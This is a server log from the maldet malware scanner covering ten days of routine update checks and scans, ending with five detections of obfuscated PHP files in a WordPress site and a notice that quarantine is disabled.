Mar 06 2026 04:34:27 web1 maldet(260375): {update} hashing install files and checking against server...
Mar 06 2026 04:34:28 web1 maldet(260375): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 06 2026 04:34:28 web1 maldet(260375): {update} latest version already installed.
Mar 06 2026 04:34:28 web1 maldet(260484): {sigup} performing signature update check...
Mar 06 2026 04:34:28 web1 maldet(260484): {sigup} local signature set is version 202603041988132
Mar 06 2026 04:34:28 web1 maldet(260484): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 06 2026 04:34:28 web1 maldet(260484): {sigup} latest signature set already installed
Mar 06 2026 04:34:28 web1 maldet(260572): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 06 2026 04:34:28 web1 maldet(260572): {scan} signatures loaded: 17660 (14823 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 06 2026 04:34:28 web1 maldet(260572): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 06 2026 04:34:28 web1 maldet(260572): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 06 2026 04:34:28 web1 maldet(260572): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 06 2026 04:35:04 web1 maldet(260572): {scan} file list completed in 36s, found 10819 files...
Mar 06 2026 04:35:04 web1 maldet(260572): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 06 2026 04:35:04 web1 maldet(260572): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (10819 files) in progress...
Mar 06 2026 04:36:21 web1 maldet(260572): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 10819, malware hits 0, cleaned hits 0, time 113s
Mar 06 2026 04:36:21 web1 maldet(260572): {scan} scan report saved, to view run: maldet --report 260306-0434.260572
Mar 07 2026 04:05:01 web1 maldet(687262): {update} checking for available updates...
Mar 07 2026 04:05:01 web1 maldet(687262): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 07 2026 04:05:01 web1 maldet(687262): {update} hashing install files and checking against server...
Mar 07 2026 04:05:01 web1 maldet(687262): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 07 2026 04:05:01 web1 maldet(687262): {update} latest version already installed.
Mar 07 2026 04:05:01 web1 maldet(687469): {sigup} performing signature update check...
Mar 07 2026 04:05:01 web1 maldet(687469): {sigup} local signature set is version 202603041988132
Mar 07 2026 04:05:01 web1 maldet(687469): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 07 2026 04:05:01 web1 maldet(687469): {sigup} new signature set 202603071550177 available
Mar 07 2026 04:05:01 web1 maldet(687469): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 07 2026 04:05:02 web1 maldet(687469): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 07 2026 04:05:02 web1 maldet(687469): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Mar 07 2026 04:05:02 web1 maldet(687469): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 07 2026 04:05:02 web1 maldet(687469): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 07 2026 04:05:02 web1 maldet(687469): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Mar 07 2026 04:05:02 web1 maldet(687469): {sigup} verified md5sum of maldet-sigpack.tgz
Mar 07 2026 04:05:02 web1 maldet(687469): {sigup} unpacked and installed maldet-sigpack.tgz
Mar 07 2026 04:05:02 web1 maldet(687469): {sigup} verified md5sum of maldet-clean.tgz
Mar 07 2026 04:05:02 web1 maldet(687469): {sigup} unpacked and installed maldet-clean.tgz
Mar 07 2026 04:05:02 web1 maldet(687469): {sigup} signature set update completed
Mar 07 2026 04:05:02 web1 maldet(687469): {sigup} 17660 signatures (14823 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 07 2026 04:05:02 web1 maldet(687671): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 07 2026 04:05:03 web1 maldet(687671): {scan} signatures loaded: 17660 (14823 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 07 2026 04:05:03 web1 maldet(687671): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 07 2026 04:05:03 web1 maldet(687671): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 07 2026 04:05:03 web1 maldet(687671): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 07 2026 04:05:48 web1 maldet(687671): {scan} file list completed in 45s, found 8389 files...
Mar 07 2026 04:05:48 web1 maldet(687671): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 07 2026 04:05:48 web1 maldet(687671): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (8389 files) in progress...
Mar 07 2026 04:07:09 web1 maldet(687671): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 8389, malware hits 0, cleaned hits 0, time 127s
Mar 07 2026 04:07:09 web1 maldet(687671): {scan} scan report saved, to view run: maldet --report 260307-0405.687671
Mar 08 2026 03:56:26 web1 maldet(1102943): {update} checking for available updates...
Mar 08 2026 03:56:26 web1 maldet(1102943): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 08 2026 03:56:26 web1 maldet(1102943): {update} hashing install files and checking against server...
Mar 08 2026 03:56:26 web1 maldet(1102943): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 08 2026 03:56:26 web1 maldet(1102943): {update} latest version already installed.
Mar 08 2026 03:56:26 web1 maldet(1103052): {sigup} performing signature update check...
Mar 08 2026 03:56:26 web1 maldet(1103052): {sigup} local signature set is version 202603071550177
Mar 08 2026 03:56:27 web1 maldet(1103052): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 08 2026 03:56:27 web1 maldet(1103052): {sigup} latest signature set already installed
Mar 08 2026 03:56:27 web1 maldet(1103140): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 08 2026 03:56:27 web1 maldet(1103140): {scan} signatures loaded: 17660 (14823 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 08 2026 03:56:27 web1 maldet(1103140): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 08 2026 03:56:27 web1 maldet(1103140): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 08 2026 03:56:27 web1 maldet(1103140): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 08 2026 03:57:02 web1 maldet(1103140): {scan} file list completed in 35s, found 6191 files...
Mar 08 2026 03:57:02 web1 maldet(1103140): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 08 2026 03:57:02 web1 maldet(1103140): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (6191 files) in progress...
Mar 08 2026 03:57:53 web1 maldet(1103140): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 6191, malware hits 0, cleaned hits 0, time 86s
Mar 08 2026 03:57:53 web1 maldet(1103140): {scan} scan report saved, to view run: maldet --report 260308-0356.1103140
Mar 08 2026 23:42:24 web1 maldet(1145): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Mar 09 2026 03:37:19 web1 maldet(88073): {update} checking for available updates...
Mar 09 2026 03:37:19 web1 maldet(88073): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 09 2026 03:37:20 web1 maldet(88073): {update} hashing install files and checking against server...
Mar 09 2026 03:37:20 web1 maldet(88073): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 09 2026 03:37:20 web1 maldet(88073): {update} latest version already installed.
Mar 09 2026 03:37:20 web1 maldet(88183): {sigup} performing signature update check...
Mar 09 2026 03:37:20 web1 maldet(88183): {sigup} local signature set is version 202603071550177
Mar 09 2026 03:37:20 web1 maldet(88183): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 09 2026 03:37:20 web1 maldet(88183): {sigup} latest signature set already installed
Mar 09 2026 03:37:20 web1 maldet(88273): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 09 2026 03:37:20 web1 maldet(88273): {scan} signatures loaded: 17660 (14823 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 09 2026 03:37:20 web1 maldet(88273): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 09 2026 03:37:20 web1 maldet(88273): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 09 2026 03:37:20 web1 maldet(88273): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 09 2026 03:37:54 web1 maldet(88273): {scan} file list completed in 34s, found 1639 files...
Mar 09 2026 03:37:54 web1 maldet(88273): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 09 2026 03:37:54 web1 maldet(88273): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (1639 files) in progress...
Mar 09 2026 03:38:26 web1 maldet(88273): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 1639, malware hits 0, cleaned hits 0, time 66s
Mar 09 2026 03:38:26 web1 maldet(88273): {scan} scan report saved, to view run: maldet --report 260309-0337.88273
Mar 10 2026 03:59:05 web1 maldet(510708): {update} checking for available updates...
Mar 10 2026 03:59:05 web1 maldet(510708): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 10 2026 03:59:05 web1 maldet(510708): {update} hashing install files and checking against server...
Mar 10 2026 03:59:05 web1 maldet(510708): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 10 2026 03:59:05 web1 maldet(510708): {update} latest version already installed.
Mar 10 2026 03:59:05 web1 maldet(510817): {sigup} performing signature update check...
Mar 10 2026 03:59:05 web1 maldet(510817): {sigup} local signature set is version 202603071550177
Mar 10 2026 03:59:05 web1 maldet(510817): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 10 2026 03:59:05 web1 maldet(510817): {sigup} new signature set 202603103603122 available
Mar 10 2026 03:59:05 web1 maldet(510817): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 10 2026 03:59:06 web1 maldet(510817): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 10 2026 03:59:06 web1 maldet(510817): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Mar 10 2026 03:59:06 web1 maldet(510817): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 10 2026 03:59:06 web1 maldet(510817): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 10 2026 03:59:06 web1 maldet(510817): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Mar 10 2026 03:59:06 web1 maldet(510817): {sigup} verified md5sum of maldet-sigpack.tgz
Mar 10 2026 03:59:06 web1 maldet(510817): {sigup} unpacked and installed maldet-sigpack.tgz
Mar 10 2026 03:59:06 web1 maldet(510817): {sigup} verified md5sum of maldet-clean.tgz
Mar 10 2026 03:59:06 web1 maldet(510817): {sigup} unpacked and installed maldet-clean.tgz
Mar 10 2026 03:59:06 web1 maldet(510817): {sigup} signature set update completed
Mar 10 2026 03:59:06 web1 maldet(510817): {sigup} 17660 signatures (14823 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 10 2026 03:59:06 web1 maldet(511026): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 10 2026 03:59:07 web1 maldet(511026): {scan} signatures loaded: 17660 (14823 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 10 2026 03:59:07 web1 maldet(511026): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 10 2026 03:59:07 web1 maldet(511026): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 10 2026 03:59:07 web1 maldet(511026): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 10 2026 04:00:06 web1 maldet(511026): {scan} file list completed in 59s, found 6972 files...
Mar 10 2026 04:00:06 web1 maldet(511026): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 10 2026 04:00:06 web1 maldet(511026): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (6972 files) in progress...
Mar 10 2026 04:01:29 web1 maldet(511026): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 6972, malware hits 0, cleaned hits 0, time 143s
Mar 10 2026 04:01:29 web1 maldet(511026): {scan} scan report saved, to view run: maldet --report 260310-0359.511026
Mar 11 2026 03:40:59 web1 maldet(893347): {update} checking for available updates...
Mar 11 2026 03:40:59 web1 maldet(893347): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 11 2026 03:40:59 web1 maldet(893347): {update} hashing install files and checking against server...
Mar 11 2026 03:40:59 web1 maldet(893347): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 11 2026 03:40:59 web1 maldet(893347): {update} latest version already installed.
Mar 11 2026 03:40:59 web1 maldet(893457): {sigup} performing signature update check...
Mar 11 2026 03:40:59 web1 maldet(893457): {sigup} local signature set is version 202603103603122
Mar 11 2026 03:40:59 web1 maldet(893457): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 11 2026 03:40:59 web1 maldet(893457): {sigup} latest signature set already installed
Mar 11 2026 03:40:59 web1 maldet(893545): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 11 2026 03:41:00 web1 maldet(893545): {scan} signatures loaded: 17660 (14823 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 11 2026 03:41:00 web1 maldet(893545): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 11 2026 03:41:00 web1 maldet(893545): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 11 2026 03:41:00 web1 maldet(893545): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 11 2026 03:41:33 web1 maldet(893545): {scan} file list completed in 33s, found 30496 files...
Mar 11 2026 03:41:33 web1 maldet(893545): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 11 2026 03:41:33 web1 maldet(893545): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (30496 files) in progress...
Mar 11 2026 03:46:29 web1 maldet(893545): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 30496, malware hits 0, cleaned hits 0, time 330s
Mar 11 2026 03:46:29 web1 maldet(893545): {scan} scan report saved, to view run: maldet --report 260311-0340.893545
Mar 12 2026 01:12:37 web1 maldet(1135): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Mar 12 2026 03:28:02 web1 maldet(43132): {update} checking for available updates...
Mar 12 2026 03:28:02 web1 maldet(43132): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 12 2026 03:28:02 web1 maldet(43132): {update} hashing install files and checking against server...
Mar 12 2026 03:28:02 web1 maldet(43132): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 12 2026 03:28:02 web1 maldet(43132): {update} latest version already installed.
Mar 12 2026 03:28:02 web1 maldet(43241): {sigup} performing signature update check...
Mar 12 2026 03:28:02 web1 maldet(43241): {sigup} local signature set is version 202603103603122
Mar 12 2026 03:28:02 web1 maldet(43241): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 12 2026 03:28:02 web1 maldet(43241): {sigup} latest signature set already installed
Mar 12 2026 03:28:02 web1 maldet(43329): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 12 2026 03:28:02 web1 maldet(43329): {scan} signatures loaded: 17660 (14823 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 12 2026 03:28:02 web1 maldet(43329): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 12 2026 03:28:02 web1 maldet(43329): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 12 2026 03:28:02 web1 maldet(43329): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 12 2026 03:28:40 web1 maldet(43329): {scan} file list completed in 38s, found 28808 files...
Mar 12 2026 03:28:40 web1 maldet(43329): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 12 2026 03:28:40 web1 maldet(43329): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (28808 files) in progress...
Mar 12 2026 03:32:14 web1 maldet(43329): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 28808, malware hits 0, cleaned hits 0, time 252s
Mar 12 2026 03:32:14 web1 maldet(43329): {scan} scan report saved, to view run: maldet --report 260312-0328.43329
Mar 12 2026 05:44:53 web1 maldet(1165): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Mar 13 2026 03:57:15 web1 maldet(421676): {update} checking for available updates...
Mar 13 2026 03:57:16 web1 maldet(421676): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 13 2026 03:57:16 web1 maldet(421676): {update} hashing install files and checking against server...
Mar 13 2026 03:57:16 web1 maldet(421676): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 13 2026 03:57:16 web1 maldet(421676): {update} latest version already installed.
Mar 13 2026 03:57:16 web1 maldet(421785): {sigup} performing signature update check...
Mar 13 2026 03:57:16 web1 maldet(421785): {sigup} local signature set is version 202603103603122
Mar 13 2026 03:57:16 web1 maldet(421785): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 13 2026 03:57:16 web1 maldet(421785): {sigup} new signature set 202603132091366 available
Mar 13 2026 03:57:16 web1 maldet(421785): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 13 2026 03:57:16 web1 maldet(421785): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 13 2026 03:57:16 web1 maldet(421785): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Mar 13 2026 03:57:16 web1 maldet(421785): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 13 2026 03:57:16 web1 maldet(421785): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 13 2026 03:57:17 web1 maldet(421785): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Mar 13 2026 03:57:17 web1 maldet(421785): {sigup} verified md5sum of maldet-sigpack.tgz
Mar 13 2026 03:57:17 web1 maldet(421785): {sigup} unpacked and installed maldet-sigpack.tgz
Mar 13 2026 03:57:17 web1 maldet(421785): {sigup} verified md5sum of maldet-clean.tgz
Mar 13 2026 03:57:17 web1 maldet(421785): {sigup} unpacked and installed maldet-clean.tgz
Mar 13 2026 03:57:17 web1 maldet(421785): {sigup} signature set update completed
Mar 13 2026 03:57:17 web1 maldet(421785): {sigup} 17661 signatures (14824 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 13 2026 03:57:17 web1 maldet(421992): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 13 2026 03:57:17 web1 maldet(421992): {scan} signatures loaded: 17661 (14824 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 13 2026 03:57:17 web1 maldet(421992): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 13 2026 03:57:17 web1 maldet(421992): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 13 2026 03:57:17 web1 maldet(421992): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 13 2026 03:58:04 web1 maldet(421992): {scan} file list completed in 47s, found 29133 files...
Mar 13 2026 03:58:04 web1 maldet(421992): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 13 2026 03:58:04 web1 maldet(421992): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (29133 files) in progress...
Mar 13 2026 04:03:21 web1 maldet(421992): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 29133, malware hits 0, cleaned hits 0, time 364s
Mar 13 2026 04:03:21 web1 maldet(421992): {scan} scan report saved, to view run: maldet --report 260313-0357.421992
Mar 14 2026 03:52:52 web1 maldet(883602): {update} checking for available updates...
Mar 14 2026 03:52:52 web1 maldet(883602): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 14 2026 03:52:52 web1 maldet(883602): {update} hashing install files and checking against server...
Mar 14 2026 03:52:52 web1 maldet(883602): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 14 2026 03:52:52 web1 maldet(883602): {update} latest version already installed.
Mar 14 2026 03:52:52 web1 maldet(883711): {sigup} performing signature update check...
Mar 14 2026 03:52:52 web1 maldet(883711): {sigup} local signature set is version 202603132091366
Mar 14 2026 03:52:52 web1 maldet(883711): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 14 2026 03:52:52 web1 maldet(883711): {sigup} latest signature set already installed
Mar 14 2026 03:52:52 web1 maldet(883799): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 14 2026 03:52:52 web1 maldet(883799): {scan} signatures loaded: 17661 (14824 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 14 2026 03:52:52 web1 maldet(883799): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 14 2026 03:52:52 web1 maldet(883799): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 14 2026 03:52:52 web1 maldet(883799): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 14 2026 03:53:27 web1 maldet(883799): {scan} file list completed in 35s, found 36878 files...
Mar 14 2026 03:53:27 web1 maldet(883799): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 14 2026 03:53:27 web1 maldet(883799): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (36878 files) in progress...
Mar 14 2026 03:59:38 web1 maldet(883799): {hit} malware hit {HEX}php.nested.base64.652 found for /home/sps/public_html/wp-includes/block-supports/widgets/index.php
Mar 14 2026 03:59:38 web1 maldet(883799): {hit} malware hit {HEX}php.nested.base64.652 found for /home/sps/public_html/wp-includes/ID3/abilities-api/index.php
Mar 14 2026 03:59:38 web1 maldet(883799): {hit} malware hit {HEX}php.exe.globals.416 found for /home/sps/public_html/bad/wp-includes/wkwydt.php
Mar 14 2026 03:59:38 web1 maldet(883799): {hit} malware hit {HEX}php.nested.base64.652 found for /home/sps/public_html/wp-content/ngg/modules/photocrati-nextgen_basic_gallery/templates/acme-challenge/index.php
Mar 14 2026 03:59:38 web1 maldet(883799): {hit} malware hit {HEX}php.nested.base64.652 found for /home/sps/public_html/wp-admin/includes/colors/index.php
Mar 14 2026 03:59:38 web1 maldet(883799): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 36878, malware hits 5, cleaned hits 0, time 406s
Mar 14 2026 03:59:38 web1 maldet(883799): {scan} scan report saved, to view run: maldet --report 260314-0352.883799
Mar 14 2026 03:59:38 web1 maldet(883799): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260314-0352.883799
Mar 15 2026 04:25:39 web1 maldet(1298911): {update} checking for available updates...
Mar 15 2026 04:25:39 web1 maldet(1298911): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 15 2026 04:25:39 web1 maldet(1298911): {update} hashing install files and checking against server...
Mar 15 2026 04:25:39 web1 maldet(1298911): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 15 2026 04:25:39 web1 maldet(1298911): {update} latest version already installed.
Mar 15 2026 04:25:39 web1 maldet(1299024): {sigup} performing signature update check...
Mar 15 2026 04:25:39 web1 maldet(1299024): {sigup} local signature set is version 202603132091366
Mar 15 2026 04:25:40 web1 maldet(1299024): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 15 2026 04:25:40 web1 maldet(1299024): {sigup} latest signature set already installed
Mar 15 2026 04:25:40 web1 maldet(1299113): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 15 2026 04:25:40 web1 maldet(1299113): {scan} signatures loaded: 17661 (14824 MD5 | 2054 HEX | 783 YARA | 0 USER)
Mar 15 2026 04:25:40 web1 maldet(1299113): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
